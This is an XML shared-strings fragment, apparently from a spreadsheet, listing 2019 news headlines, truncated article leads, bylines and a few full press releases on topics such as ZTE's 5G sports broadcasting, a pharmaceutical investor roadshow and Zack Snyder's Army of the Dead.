  <si>
    <t>FAYETTEVILLE, N.C. (WTVD) — A body recovered from the Cape Fear River early Sunday morning matches the description of a boater who went...</t>
  </si>
  <si>
    <t>Edward Oldfield</t>
  </si>
  <si>
    <t>Plymouth City Council is marking the completion of 50 of the 100 pledges made when Labour took control last year. The promises cover all...</t>
  </si>
  <si>
    <t>Tracking shares of Viva Energy Reit (VVR.AX), we have seen that the stock price has fallen -2.21% over the last month. Focusing on the past...</t>
  </si>
  <si>
    <t>In order to dissert the market scenario prevailing across the clinical trial management systems market sector, FactMR has evenly presented...</t>
  </si>
  <si>
    <t>Bill Fee</t>
  </si>
  <si>
    <t>Prince Rupert RCMP say they are following up on a number of tips about a missing North Coast man. Lawrence Douglas Maitland was last...</t>
  </si>
  <si>
    <t>Bryan Renbaum</t>
  </si>
  <si>
    <t>WASHINGTON – Senate Majority Leader Mitch McConnell defended a $1.37 billion budget deal brokered between congressional leaders and the...</t>
  </si>
  <si>
    <t>Estonia Jun Producer Prices Up 0.1% On Month</t>
  </si>
  <si>
    <t>Written by Raakhi Jagga</t>
  </si>
  <si>
    <t>No minister or MLA from the ruling Congress party attended a felicitation function for war widows and soldiers at Maharaja Ranjit Singh War...</t>
  </si>
  <si>
    <t>LONDON, July 24 (Reuters) - England crashed back to earth after their World Cup triumph as they were skittled for 85 on a humiliating...</t>
  </si>
  <si>
    <t>Can the temperature of a room affect a buyer’s eagerness to buy an item—or haggle for a good deal? Yes, according to a new study from...</t>
  </si>
  <si>
    <t>QUESTION: One course of action for the Cardinals with Carpenter could be to try and find a home for him as a DH with an AL team. How real...</t>
  </si>
  <si>
    <t>NEW YORK, July 29, 2019 (GLOBE NEWSWIRE) -- Halper Sadeh LLP, a global investor rights law firm, is investigating whether the sale of...</t>
  </si>
  <si>
    <t>Willoughby, OH, July 25, 2019 --(PR.com)-- Process Technology is proud to welcome Peter Baker as the newest sales team member. Peter will...</t>
  </si>
  <si>
    <t>The mother of an epileptic five-year-old said the girl has been condemned to “becoming comatose and wracked by seizures” after Border Force...</t>
  </si>
  <si>
    <t>ST. LOUIS, July 24, 2019 /PRNewswire-PRWeb/ -- Iron Age Footwear proudly introduces its innovative Immortalizer work boot series. The...</t>
  </si>
  <si>
    <t>Jacky</t>
  </si>
  <si>
    <t>Although many of us have been told that we have a double, only a few find their resemblance to a famous face so creepy that they have made...</t>
  </si>
  <si>
    <t>COLUMBUS, Ohio (AP) — The moon may be made of cheese, but these astronauts are made of butter. The Ohio State Fair is commemorating the...</t>
  </si>
  <si>
    <t>Theo Katsaros</t>
  </si>
  <si>
    <t>Wests Tigers legend Robbie Farah has called time on his 17-year NRL career with the 2019 campaign to be his last. The 35-year-old Farah...</t>
  </si>
  <si>
    <t>ATLien</t>
  </si>
  <si>
    <t>Rapper Clifford “T.I” Harris is known for his “Us or Else” mentality when it comes to racial issues but apparently that doesn’t apply to...</t>
  </si>
  <si>
    <t>A visit by the Prince of Wales to the Co Sligo village where an IRA bomb killed his great-uncle helped “put an end to the sadness” in the...</t>
  </si>
  <si>
    <t>Written by Jason Volny</t>
  </si>
  <si>
    <t>Training new hires is full of many challenges. The biggest being: What to teach them first? Check out the video to gain insight into what...</t>
  </si>
  <si>
    <t>Calton &amp; Associates Inc. lifted its position in AbbVie Inc (NYSE:ABBV) by 3.0% in the second quarter, according to the company in its most...</t>
  </si>
  <si>
    <t>BUFFALO, N.Y. (AP) -- Rene Rivera hit a two-run homer in the sixth inning, leading the Syracuse Mets to an 11-4 win over the Buffalo Bisons...</t>
  </si>
  <si>
    <t>Spectrum News Staff</t>
  </si>
  <si>
    <t>Photo Courtesy of Matthew Smith COLUMBUS, Ohio—Music has always been a part of Ashad Mitchell’s life. Kvng Shad became depressed after...</t>
  </si>
  <si>
    <t>SHENZHEN, China, Aug. 9, 2019 /PRNewswire/ -- ZTE Corporation (0763.HK / 000063.SZ), a major international provider of telecommunications, enterprise and consumer technology solutions for the mobile internet, has announced today that ZTE and the Shanxi Branch of China Mobile broadcast the 2nd National Youth Games of China with integrated 5G Live TV solutions. With ZTE's 5G technologies widely adopted in video collection, editing, broadcasting and transmission for the live streaming of the 2nd National Youth Games, it is China's first 5G sporting event. ZTE's Digital Intelligent Indoor System 5G-QCell solution covers multiple major venues, including the main stadium. This solution delivers an innovative viewing experience by providing the audience with three distinctive 5G scenarios, including multi-angle views, flexible zooming, and free viewpoint, fully meeting the audience's personalized needs for game watching. Backed up with technologies such as MEC and low latency coding, ZTE's 5G Live TV solutions reduce the live end-to-end latency to less than 1 second, so that the off-site audience can experience the games in real time. Moreover, by means of the industry-leading video production and playback technologies, the on-site spectators can enjoy a special viewing experience on the multi-angle live streaming APP. In addition, the IPTV subscribers of the Shanxi Branch of China Mobile can also access the real-time multi-angle UHD live games on the IPTV platform, watching the high-definition game from four different viewing angles, thereby providing subscribers with a customized game watching experience. Meanwhile, ZTE will provide the 5G-QCell deployment solution for the future network capacity expansion and new service functions, such as MEC and LBS(Location Based Services).By August, ZTE has shipped over 80,000 5G QCell products worldwide. In May 2019, ZTE signed a strategic cooperation agreement with the Sport Bureau of Shanxi Province, Shanxi Radio and Television Station, and the Shanxi Branch of China Mobile, in a bid to create a distinctive live streaming experience for China's first 5G national sport games. The application of 5G Live TV solutions in the 2nd National Youth Games sets a great example for the future live streaming of sporting events. With the large-scale deployments of 5G networks and vigorous development of 8K/VR/AR video technologies, ZTE will continue to promote 5G Live TV commercialization in collaboration with partners, exploring the live streaming solutions, industry applications, and in-depth cooperation among industry players in the 5G scenario. About ZTE ZTE is a provider of advanced telecommunications systems, mobile devices, and enterprise technology solutions to consumers, carriers, companies and public sector customers. As part of ZTE's strategy, the company is committed to providing customers with integrated end-to-end innovations to deliver excellence and value as the telecommunications and information technology sectors converge. Listed in the stock exchanges of Hong Kong and Shenzhen (H share stock code: 0763.HK / A share stock code: 000063.SZ), ZTE's products and services are sold to over 500 operators in more than 160 countries. ZTE commits 10 per cent of its annual revenue to research and development and has leadership roles in international standard-setting organizations. ZTE is committed to corporate social responsibility and is a member of the UN Global Compact. For more information, please visit https://www.zte.com.cn/global/ Media Contacts: Margaret Ma ZTE Corporation Tel: +86 755 26775189 Email: ma.gaili@zte.com.cn SOURCE ZTE Corporation</t>
  </si>
  <si>
    <t>Joseph Casey</t>
  </si>
  <si>
    <t>Mosaic Capital Corp (CVE:M)’s stock price passed below its two hundred day moving average during trading on Wednesday . The stock has a two...</t>
  </si>
  <si>
    <t>Aug 13, 2019 (SmarTrend(R) News Watch via COMTEX News Network) -- Nike Inc -Cl B (NYSE:NKE) traded in a range yesterday that spanned from...</t>
  </si>
  <si>
    <t>According to the recent study by IMARC Group, titled “Solar Panel Market: Global Industry Trends, Share, Size, Growth, Opportunity and...</t>
  </si>
  <si>
    <t>Abacus Health Products, Inc. (CSE: ABCS, OTCQX: ABAHF) (“Abacus” or the “Company”) will release its 2019 second quarter financial results...</t>
  </si>
  <si>
    <t>Is Robert Francis O’Rourke actually running for president? Don’t misunderstand me. I am fully aware that he remains, nominally, one of the...</t>
  </si>
  <si>
    <t>A look at what's happening around the majors Saturday: NOW PITCHING Trevor Bauer (9-8, 3.79 ERA) makes his Cincinnati debut four days...</t>
  </si>
  <si>
    <t>MASON, Ohio (AP) — Ashleigh Barty edged Anett Kontaveit 4-6, 7-5, 7-5 to reach the Western &amp; Southern Open quarterfinals on Thursday. The...</t>
  </si>
  <si>
    <t>By DAVID CRARY AP National Writer</t>
  </si>
  <si>
    <t>FILE - In this Aug. 5, 2013, file photo hundreds participate in a candlelight vigil at the Sikh Temple of Wisconsin to mark the one-year...</t>
  </si>
  <si>
    <t>Cross-border police co-operation in Ireland is at serious risk in the event of a no-deal Brexit, new research has found. A report...</t>
  </si>
  <si>
    <t>ATLANTA, Aug. 29, 2019 /PRNewswire/ -- Dawn Alston, who has had a 20-year career at Spelman College, has been appointed chief financial...</t>
  </si>
  <si>
    <t>The Global Bone Sonometers market report is a first of its kind research report that covers the overview, summary, market dynamics,...</t>
  </si>
  <si>
    <t>Suwanee, Ga - (NewMediaWire) - August 01, 2019 - SANUWAVE Health, Inc. (OTCQB: SNWV)is pleased to provide an update of current clinical...</t>
  </si>
  <si>
    <t>MISSISSAUGA, ON, June 11, 2019 /PRNewswire/ - ADVANZ PHARMA Corp. ("ADVANZ PHARMA" or "the Company") (TSX:ADVZ), a global pharmaceutical company focused on serving the needs of patients and healthcare providers around the world with enhanced access to high quality, niche-established medicines, today announced that it intends to hold a non-deal roadshow ("NDR") to provide a corporate update for European-based investors. The group sessions will be held in London, England, on June 13th and 14th, 2019. The NDR will be hosted by Jefferies International Limited. A copy of the corporate presentation that will be used during the NDR will be available after market close on June 12th, 2019. The presentation will be posted on the Company's website in the Investors section under `Downloads' through the following link: https://www.advanzpharma.com/investors/downloads About ADVANZ PHARMA ADVANZ PHARMA operates an international specialty pharmaceutical business with a diversified portfolio of more than 200 patented and off-patent products, and sales in more than 90 countries and going forward is focused on becoming the leading platform for niche-established medicines, with advanced commercial capabilities throughout Western Europe. ADVANZ PHARMA operates out of facilities in Mississauga, Ontario and, through its subsidiaries, operates out of facilities in Sydney, Australia; Bridgetown, Barbados; London, England; Mumbai, India; Dublin, Ireland; St. Helier, Jersey; and in Helsingborg, Sweden. Notice regarding forward-looking statements and information: This news release includes forward?looking statements within the meaning of the United States Private Securities Litigation Reform Act of 1995 and forward?looking information within the meaning of Canadian securities laws, regarding ADVANZ PHARMA and its business, which may include, but are not limited to, statements with respect to its intention to hold a non-deal roadshow to provide a corporate update for European-based investors, and posting a presentation on the Company's website. Often, but not always, forward?looking statements and forward?looking information can be identified by the use of words such as "plans", "is expected", "expects", "scheduled", "intends", "contemplates", "anticipates", "believes", "proposes", "aims", "becomes", "sees", "looks" or variations (including negative and grammatical variations) of such words and phrases, or state that certain actions, events or results "may", "could", "would", "might" or "will" be taken, occur or be achieved. Such statements are based on the current expectations of the Company's management, and are based on assumptions and subject to risks and uncertainties. Although the Company's management believes that the assumptions underlying these statements are reasonable, they may prove to be incorrect. The forward-looking events and circumstances discussed in this press release may not occur by certain specified dates or at all and could differ materially as a result of known and unknown risk factors and uncertainties affecting the Company, including the inability to help innovate, shape and grow the specialty, off-patent sector, the inability to build on the Company's current capabilities and global footprint, the Company being unable to meet the increasingly complex needs of global healthcare systems, the Company's inability to build on its current capabilities and global footprint, the Company's inability to supply a diverse range of high quality, established medicines, the Company's inability to provide a platform for future growth, the Company's inability to provide greater access to medicines for patients, the Company's inability to provide sustainable value for healthcare providers, the Company's inability to maintain its current financial position, the risk that the Company's shareholders do not support the Company's current strategy, the Company's inability to deliver a progressive company that is ready for the future, the Company's inability to leverage its current balance sheet to build out its pipeline of medicines, the Company's inability to leverage its balance sheet to acquire both companies and standalone medicines, the Company's inability to be the most idea-generative company in the generics industry, and risks and uncertainties detailed from time to time in the Company's filings with the Securities and Exchange Commission and the Canadian Securities Administrators and many other factors beyond the control of the Company. Although the Company has attempted to identify important factors that could cause actual actions, events or results to differ materially from those described in forward-looking statements and forward-looking information, there may be other factors that cause actions, events or results to differ from those anticipated, estimated or intended. No forward-looking statement or forward-looking information can be guaranteed. Except as required by applicable securities laws, forward-looking statements and forward-looking information speak only as of the date on which they are made and the Company undertakes no obligation to publicly update or revise any forward-looking statement or forward-looking information, whether as a result of new information, future events, or otherwise. View original content:http://www.prnewswire.com/news-releases/advanz-pharma-corp-announces-non-deal-roadshow-for-european-based-debt-investors-300865371.html SOURCE ADVANZ PHARMA Corp.</t>
  </si>
  <si>
    <t>ERIK S. LESSER</t>
  </si>
  <si>
    <t>Medianumber 55384514</t>
  </si>
  <si>
    <t>Zack Snyder is retuning to his zombie roots with the upcoming action thriller Army of the Dead, which he is directing for Netflix. Long before cries for the Snyder Cut permeated the Internet, Snyder was getting his hands greasy with reanimated corpses in his Dawn of the Dead remake, which was penned by fellow DC Comics filmmaker James Gunn. Now he is back, getting down and dirty with this lower budget horror heist movie. Zack Snyder is using his latest tweet update to not only show off some skeletons on the set of Army of the Dead, but he is also using the moment to praise Jarred Land for the new cameras being used to shoot this action-horror movie hybrid. The director says this about hitting the ground to capture some truly grisly images for streaming audiences around the world. “Want to say a special thank you to Jarred Land at Red Digital Cinema for building our amazing cameras. They’re killing it. #reddigitalcinema #8k #AOTD.” This isn’t the first look we’ve gotten at Zack Snyder’s Army of the Dead. A cast and crew portrait was shipped out on social media months ago. The movie talks place in Las Vegas after a zombie outbreak has taken over the United States. A group of mercenaries have decided to storm into the City of Sin and pull off the greatest heist ever attempted. Though we’re not yet sure why or how modern money will still be valuable after an undead apocalypse proves to decimate the world. Sounds a little counter productive at this juncture, but perhaps Zack Snyder has an explanation for that in the story itself. Zack Snyder came up with the story on his own, and got Shay Hatten to write the script. He is once again producing alongside his wife Deborah Snyder as well as Wesley Coller, Ori Marmur, and Andrew Norman. Snyder has managed to cull together one hell of an ensemble for his heisting crew. The cast includes Dave Bautista, Ella Purnell, Omari Hardwick, Theo Rossi, Ana De La Reguera, Huma Qureshi, Hiroyuki Sanada , Chris D’Elia, Garret Dillahunt, Ra&amp;úl Castillo, Nora Arnezeder, Matthias Schweigh&amp;öfer, Samantha Win and Rich Cetrone. Related: Zack Snyder’s Next Movie Is Netflix’s Army of the Dead Army of the Dead is Zack Snyder’s first directorial effort since the botched Justice League movie, which still carries his name, but was half directed by Joss Whedon during reshoots. He previously worked alongside the walking zombie hordes in 2004’s Dawn of the Dead. Snyder says this of his latest movie in a recent interview. “There are no handcuffs on me at all with this one. I love to honor canon and the works of art, but this is the opportunity to find a purely joyful way to express myself through a genre. It will be the most kick-ass, self-aware — but not in a wink-to-the-camera way — balls-to-the-wall zombie freakshow that anyone has ever seen. No one’s ever let me completely loose [like this]. With Army [of the Dead], it’s difficult not to do to a social statement because the movie is about building a wall for refugees and veterans but it’s also fun to do a zombie heist in Vegas. It makes it richer and better. I can’t help myself. I’ve always worked in a self-reflective way. Cinema is a reflective art form.” Zack Snyder shared the latest Army of the Dead image himself, using his personal Twitter instead of Vero this time, which he more often does. He generally uses his Vero account to tease the mythical Snyder Cut of Justice League, which isn’t any closer to ever seeing an actual release. Though, it is confirmed to exist. Maybe fans will stop focusing on that so much, and turn their attention to Army of the Dead instead. Want to say a special thank you to Jarred Land at Red Digital Cinema for building our amazing cameras. They’re killing it. #reddigitalcinema#8k#AOTDpic.twitter.com/P9AnTvQOfZ — Zack Snyder (@ZackSnyder) August 11, 2019 Topics: Army of the Dead, Netflix, Streaming Let’s block ads! (Why?) Movieweb News</t>
  </si>
  <si>
    <t>Kyle Jackson</t>
  </si>
  <si>
    <t>Tdam USA Inc. increased its holdings in shares of AXA Equitable Holdings Inc (NYSE:EQH) by 1.1% during the second quarter, according to the...</t>
  </si>
  <si>
    <t>Casey Kenny</t>
  </si>
  <si>
    <t>Federal government making changes it says will protect Canadians from excessive drug prices The federal government is making changes that it says will better protect Canadians from excessive drug prices. Health Canada is unveiling long-awaited changes to patented medicine regulations. They include allowing what’s known as the Patented Medicine Prices Review Board to consider whether the price of a drug reflects the value it has for patients. Environment Minister touts Canada’s food guide for combating climate change Environment Minister Catherine McKenna says the call to help combat climate change by eating more plants and less meat follows the recommendations in Canada’s new food guide. The United Nations Intergovernmental Panel on Climate Change issued a report yesterday looking at land use and climate change. One conclusion was that the agriculture industry needs to make major changes to help reduce greenhouse gas emissions, including producing more plant-based proteins and less meat. B.C. man freed from jail in Syria A British Columbia man is tearfully thanking the Canadian and Lebanese governments for getting him out of a Syrian prison. Kristian Baxter shed tears today at a news conference in Beirut after being freed from eight months in captivity.</t>
  </si>
  <si>
    <t>Fleet Maintenance Software Market Size, Status And Forecast 2024 The Fleet Maintenance Software market " document adds a advantageous...</t>
  </si>
  <si>
    <t>Clive Palmer's court battle with Queensland Nickel's liquidators is expected to resume after the billionaire businessman settled a massive...</t>
  </si>
  <si>
    <t>New York, New York - One of the most challenging issues facing brands and manufacturers is enforcing Minimum Advertised Price (MAP) across...</t>
  </si>
  <si>
    <t>Ganpati Makhar decoration (Photo Credits: Keyuri’s Creations, Art My Passion YouTube) Ganesh Chaturthi is around the corner and...</t>
  </si>
  <si>
    <t>Electric Vehicle Battery Market 2019 Global Forecast to 2023 is latest report published by Market Research Future. Global Electric Vehicle...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 20, 2019 /PRNewswire/ -- KEY FINDINGS According to Inkwood Research, the global PP nonwoven fabrics market is estimated to...</t>
  </si>
  <si>
    <t>India is targeting companies including Apple, Foxconn and Wistron Corp with a charm offensive aimed at encouraging them to shift business...</t>
  </si>
  <si>
    <t>Legion Run has announced his even schedule for 2019 and 2020. Kyiv event on August 31st 2019, Barcelona on September 9th, Romania on...</t>
  </si>
  <si>
    <t>Captain Cash is now playing on 2CA, thanks to The Henry - Boutique Retirement Living! Listen at 7.15 each morning to hear Holmsey announce...</t>
  </si>
  <si>
    <t>Brainerd, MN, August 21, 2019 --(PR.com)-- Triumph LTD announces the release of a new at-home hand therapy device that finally delivers...</t>
  </si>
  <si>
    <t>SOUTH WILLIAMSPORT, Pa. (AP) — Louisiana claimed its first Little League World Series title as Marshall Louque hit a pair of doubles and...</t>
  </si>
  <si>
    <t>Miami Herald</t>
  </si>
  <si>
    <t>Florida's low-income population is signing up in greater numbers for health insurance using the Affordable Care Act exchange in the last...</t>
  </si>
  <si>
    <t>The "Global Busbar Market Size, Market Share, Application Analysis, Regional Outlook, Growth Trends, Key Players, Competitive Strategies...</t>
  </si>
  <si>
    <t>Nathan Taylor</t>
  </si>
  <si>
    <t>'There would not have been time to complete my nomination,' says Janet-Lynne Durnford; riding association 'severely disappointed' in process</t>
  </si>
  <si>
    <t>Helen Gregory</t>
  </si>
  <si>
    <t>OSCAR Coleman can point straight away to three reasons why he wanted to join New Lambton South Public's opportunity class. "My sister got...</t>
  </si>
  <si>
    <t>OMAHA, Neb., Aug. 29, 2019 /PRNewswire/ -- With many of the nation's schools starting up classes in this month, a brand-new school year is...</t>
  </si>
  <si>
    <t>The Allstate Corporation (NYSE: ALL) today announced estimated catastrophe losses for the month of July 2019 of $235 million, pre-tax ($186...</t>
  </si>
  <si>
    <t>Dublin, Aug. 12, 2019 (GLOBE NEWSWIRE) -- The "Space Situational Awareness (SSA) - Market Analysis, Trends, and Forecasts" report...</t>
  </si>
  <si>
    <t>Tim Elbra</t>
  </si>
  <si>
    <t>Phil Gould has made the explosive call that the answer to fixing the NRL judiciary lies in Sam Burgess' let-off.</t>
  </si>
  <si>
    <t>To complement the ever-increasing rise in popularity of these ninja obstacle shows, Everlast Climbing has developed brand-new “ninja-style”...</t>
  </si>
  <si>
    <t>NEWARK, N.J., Aug. 28, 2019 /PRNewswire-PRWeb/ -- The city acted swiftly to reduce lead from the water supply entering homes, by providing...</t>
  </si>
  <si>
    <t>By Olivia Duffey</t>
  </si>
  <si>
    <t>Country fusion band Darlinghurst will soon perform at the the Deni Ute Muster with "energy and harmony". The Echuca-based band is made up...</t>
  </si>
  <si>
    <t>BRISTOL, Tenn. (AP) - Denny Hamlin has won the pole for Saturday night's race at Bristol Motor Speedway, a critical short-track showdown...</t>
  </si>
  <si>
    <t>YANAN WANG Associated Press</t>
  </si>
  <si>
    <t>To these most die-hard protesters, there's no turning back.</t>
  </si>
  <si>
    <t>MICHAEL HILL Associated Press</t>
  </si>
  <si>
    <t>BETHEL, N.Y. (AP) — They helicoptered over crowds into the Woodstock festival and hiked in past abandoned cars. They danced at dawn on a...</t>
  </si>
  <si>
    <t>WASHINGTON — U.S. President Donald Trump said on Friday that the United States was not involved with a failed Iranian rocket launch, and he...</t>
  </si>
  <si>
    <t>Bringing nearly $2 million more federal funds into their local communities</t>
  </si>
  <si>
    <t>The "Top 10 Telecom Engineering Service Providers 2018" report has been added to ResearchAndMarkets.com's offering. The Top 10 Telecom...</t>
  </si>
  <si>
    <t>Zachary Dalton</t>
  </si>
  <si>
    <t>House House has announced their highly anticipated game, Untitled Goose Game, finally has a release date. After experiencing a short delay...</t>
  </si>
  <si>
    <t>A Melbourne investor has forked out $1.77 million for a retail property located on High Street, Ashburton. Located on the tightly held...</t>
  </si>
  <si>
    <t>ELENA BECATOROS Associated Press</t>
  </si>
  <si>
    <t>ATHENS, Greece (AP) — Water-dropping planes and helicopters resumed flights at first light Wednesday over a major wildfire burning through...</t>
  </si>
  <si>
    <t>LITTLE ROCK, Ark. --(BUSINESS WIRE) Windstream Enterprise (WE), a managed communication services provider, announced today that Gartner has...</t>
  </si>
  <si>
    <t>Diamond S Shipping Inc. (NYSE: DSSI) (the “Company”) announced today that it has agreed to sell two of its 2008-built medium-range product...</t>
  </si>
  <si>
    <t>By Hayley Fowler</t>
  </si>
  <si>
    <t>After an otherwise sunny afternoon in the town of Emerald Isle just off the coast of North Carolina, Joshua Lanier spotted an ominous...</t>
  </si>
  <si>
    <t>Young riders put plenty of new skills to the test after taking part in the annual Central Otago Pony Club camp recently. The two-day event...</t>
  </si>
  <si>
    <t>LINCOLN, Neb., Aug. 29, 2019 /PRNewswire/ -- Sandhills Global founders Tom and Rhonda Peed recently donated $20,000 to The Banquet, a...</t>
  </si>
  <si>
    <t>Yankees, White Sox to Play 2020 Game at ‘Field of Dreams’ Site</t>
  </si>
  <si>
    <t>Mainz' Karim Onisiwo, left, and Gladbach's Denis Zakaria, right, challenge for the ball during the German Bundesliga soccer match between...</t>
  </si>
  <si>
    <t>Luke Bryan, Lionel Richie and Katy Perry are coming back as the hosts for Season 3 of American Idol on ABC. Luke himself confirmed the news...</t>
  </si>
  <si>
    <t>By            Ashley Macha</t>
  </si>
  <si>
    <t>If you're regularly active, stretches are likely part of your workout routine. If you've skipped these drills, there's no time like the...</t>
  </si>
  <si>
    <t>ANAHEIM, Calif. -- Forget everything you know about Cruella de Vil: Disney dropped a first look at Emma Stone as the iconic villain in the...</t>
  </si>
  <si>
    <t>Alex Razo</t>
  </si>
  <si>
    <t>Despite pressure from anti-gun groups following the mass shooting in El Paso, Walmart officials say they will continue to sell firearms and...</t>
  </si>
  <si>
    <t>Pine Island Eagle</t>
  </si>
  <si>
    <t>The Pine Island Library will hold a book discussion at 1:30 p.m., Thursday, Sept. 19. The book to be discussed is "Everglades: River of...</t>
  </si>
  <si>
    <t>The Philadelphia Phillies will open up an important three-game series in Miami this weekend towards the Marlins, as they attempt to attain...</t>
  </si>
  <si>
    <t>Publication of Annual Report and Accounts TORTOLA / ACCESSWIRE / August 30, 2019 / Atlas Mara Limited (LSE:ATMA)("Atlas Mara" or the...</t>
  </si>
  <si>
    <t>Michael Randall, Herald Sun</t>
  </si>
  <si>
    <t>AFL boss Gillon McLachlan wants more transparency from ASADA as a decision on Collingwood youngster Sam Murray’s cocaine case draws near....</t>
  </si>
  <si>
    <t>Kylie Jenner and Travis Scott have fun on a jet ski on Kylie's 22nd Birthday in Positano, Italy</t>
  </si>
  <si>
    <t>Jameela Jamil has spoke out in defence of the Duke and Duchess of Sussex.</t>
  </si>
  <si>
    <t>LAS VEGAS, Aug. 22, 2019 /PRNewswire/ -- In healthcare, an IT system failure impacts more than the bottom line—it adversely affects patient...</t>
  </si>
  <si>
    <t>NBC Sports Washington is decided to create a playing-concentrated telecast for the Redskins' preseason games. Washington's first preseason...</t>
  </si>
  <si>
    <t>SR Staff</t>
  </si>
  <si>
    <t>Algonquin Power &amp; Utilities Corp. AQN is set to release second-quarter 2019 results on Aug 8, after market close. In the last reported...</t>
  </si>
  <si>
    <t>Inc. magazine today ranked PICS on the 2019 Inc. 5000 list with three-year revenue growth of 64%. The Inc. 5000 list is the most...</t>
  </si>
  <si>
    <t>Foreign secretary Dominic Raab has been told to stop interfering in Hong Kong’s affairs by Beijing after calling for an independent...</t>
  </si>
  <si>
    <t>Freddie Freeman and Adam Duvall homered and left-hander Max Fried earned his 12th win when the Atlanta Braves beat the visiting Cincinnati...</t>
  </si>
  <si>
    <t>Anton Spice</t>
  </si>
  <si>
    <t>The cult collection of “psych/prog/punk peculiarities” assembled by Finders Keepers.</t>
  </si>
  <si>
    <t>Voice search won’t be a passing fad. Many experts expect voice search will dominate how consumers discover products and find services...</t>
  </si>
  <si>
    <t>SMALL- and medium-sized enterprises (SMEs) are getting more help to automate their businesses, in the form of an automation starter pack of...</t>
  </si>
  <si>
    <t>Australian Associated Press</t>
  </si>
  <si>
    <t>The number of young Australians choosing not to drink has increased by more than 50 per cent since 2013. The International Alliance for...</t>
  </si>
  <si>
    <t>Global “Electronic Locks Market” 2019 Industry Research Report is a professional and in-depth study on the current state of the Global...</t>
  </si>
  <si>
    <t>(BPT) - Planning a trip abroad? That’s exciting! But you have lots to do and less time than you think to get it done. What do you need to...</t>
  </si>
  <si>
    <t>Ukraine coach, Andriy Shevchenko has called up twenty-four players for the friendly game against Nigeria and the upcoming European...</t>
  </si>
  <si>
    <t>W Hotels, specifically the W Hotel in Washington, DC, has introduced a new room service option that’ll appeal to YouTubers: the Sip &amp; Slurp...</t>
  </si>
  <si>
    <t>The global Mining Dump Trucks market was valued at $XX million in 2017, and Radiant Insights analysts predict the global market size will...</t>
  </si>
  <si>
    <t>The non-profit that operates Governors Island has hired a real estate executive to help undertake potentially millions of square feet of...</t>
  </si>
  <si>
    <t>Taylor Swift tries to keep her personal travel arrangements low-key to avoid crazy stalkers who show up at her door.The 29-year-old splits...</t>
  </si>
  <si>
    <t>WorkWave to globally leverage industry leading mapping data, routing and geocoder solutions from HERE Amsterdam – HERE Technologies, a...</t>
  </si>
  <si>
    <t>DAVID NAKAMURA david.nakamura@washpost.com</t>
  </si>
  <si>
    <t>Trump abandons pretense of friendship with Chinese rival. President Trump on Friday lashed out personally at Chinese President Xi Jinping,...</t>
  </si>
  <si>
    <t>By Janine Puhak</t>
  </si>
  <si>
    <t>On May 10, Michael Garcia returned to his New York City apartment from his job after midnight and placed an order with DoorDash around 1...</t>
  </si>
  <si>
    <t>OLD BRIDGE – More than 40 members of the Old Bridge Business Alliance and the Old Bridge Sayreville South Amboy Chamber of Commerce (OBSSA)...</t>
  </si>
  <si>
    <t>A lawyer representing an accuser of convicted paedophile Jeffrey Epstein who claims she was forced into a sexual encounter with the Duke of...</t>
  </si>
  <si>
    <t>GE Healthcare joined hands with Avalon to ramp up cell therapy production and thereby streamlines the whole development/commercialization...</t>
  </si>
  <si>
    <t>As BroadwayWorld first reported last week, Sting's acclaimed musical, THE LAST SHIP, starring and featuring original music and lyrics by...</t>
  </si>
  <si>
    <t>Milo Ventimiglia changed into currently grew to become down for a task in a huge superhero franchise. The actor revealed he changed into...</t>
  </si>
  <si>
    <t>Unification (CURRENCY:UND) traded 2.8% lower against the U.S. dollar during the 24-hour period ending at 17:00 PM ET on August 27th....</t>
  </si>
  <si>
    <t>By: Gabriel Pabico Lalu - Reporter / @GabrielLaluINQ</t>
  </si>
  <si>
    <t>Leni Robredo —OVP MANILA, Philippines – The impending release of convicted rapist and former Calauan, Laguna Mayor Antonio Sanchez will...</t>
  </si>
  <si>
    <t>Hope WoolstonMultimedia Reporter</t>
  </si>
  <si>
    <t>Get the biggest Daily stories by email Subscribe See our privacy notice Thank you for subscribingSee our privacy notice Could not...</t>
  </si>
  <si>
    <t>Hughes Associates is one of the leading providers of risk management solutions in New York. Glendale, NY -- (ReleaseWire) -- 08/13/2019 --...</t>
  </si>
  <si>
    <t>Optical Biometry Devices Market Report focuses on the important pillars of the businesses such as drivers, restraints, and opportunities...</t>
  </si>
  <si>
    <t>New Jersey, NJ, Aug. 08, 2019 (GLOBE NEWSWIRE) -- The major contributing factor for the market growth are rise in cases of tuberculosis,...</t>
  </si>
  <si>
    <t>E NORTHPORT, N.Y., Aug. 2, 2019 /PRNewswire-PRWeb/ -- Within the pages of Yardly Shoulton's new book, Sodomy the Bad Seed ($11.49,...</t>
  </si>
  <si>
    <t>Chancellor of the Exchequer Sajid Javid said he is not expecting there to be a recession.</t>
  </si>
  <si>
    <t>By Alyson Genovese, Director of GRI's USA and Canada Regional Hub</t>
  </si>
  <si>
    <t>By Joshua Peck</t>
  </si>
  <si>
    <t>MANCHESTER UNITED can finish in the Premier League top four this season after the signing of Harry Maguire.</t>
  </si>
  <si>
    <t>The Canadian Press</t>
  </si>
  <si>
    <t>OTTAWA — A preliminary estimate of the federal books says Ottawa ran a budgetary deficit of $500 million through the first three months of...</t>
  </si>
  <si>
    <t>Police in Malaysia are continuing their search for a British girl missing from a resort since Sunday. The family of Nora Quoirin, 15, have...</t>
  </si>
  <si>
    <t>Leus du Plooy and Wayne Madsen star as Derbyshire Falcons beat Yorkshire in Vitality Blast - Ripley and Heanor News</t>
  </si>
  <si>
    <t>Willingdon Wealth Management increased its stake in shares of Wheaton Precious Metals Corp (NYSE:WPM) by 218.1% in the second quarter,...</t>
  </si>
  <si>
    <t>NEW LONDON, Conn. (AP) — Construction of the planned National Coast Guard Museum is expected to begin early next year in New London....</t>
  </si>
  <si>
    <t>DENVER, Aug. 14, 2019 /PRNewswire/ -- Smashburger invites burger lovers across America to take part in their upcoming birthday bash. On...</t>
  </si>
  <si>
    <t>MILPITAS, Calif., Aug. 1, 2019 /PRNewswire/ -- Aviat Networks, Inc. (NASDAQ: AVNW), the leading expert in wireless transport solutions,...</t>
  </si>
  <si>
    <t>JEFFERSON CITY, Mo. (AP) — Missouri Auditor Nicole Galloway launched her Democratic campaign for governor Monday by highlighting her...</t>
  </si>
  <si>
    <t>Graphic Designers</t>
  </si>
  <si>
    <t>MOSCOW (AP) — A Russian space capsule carrying a humanoid robot has successfully docked at the International Space Station after a failed...</t>
  </si>
  <si>
    <t>By Miranda Willson</t>
  </si>
  <si>
    <t>The 1940s in Las Vegas was an exciting time of growth and possibility. But not all residents could share in the excitement. Just as Las...</t>
  </si>
  <si>
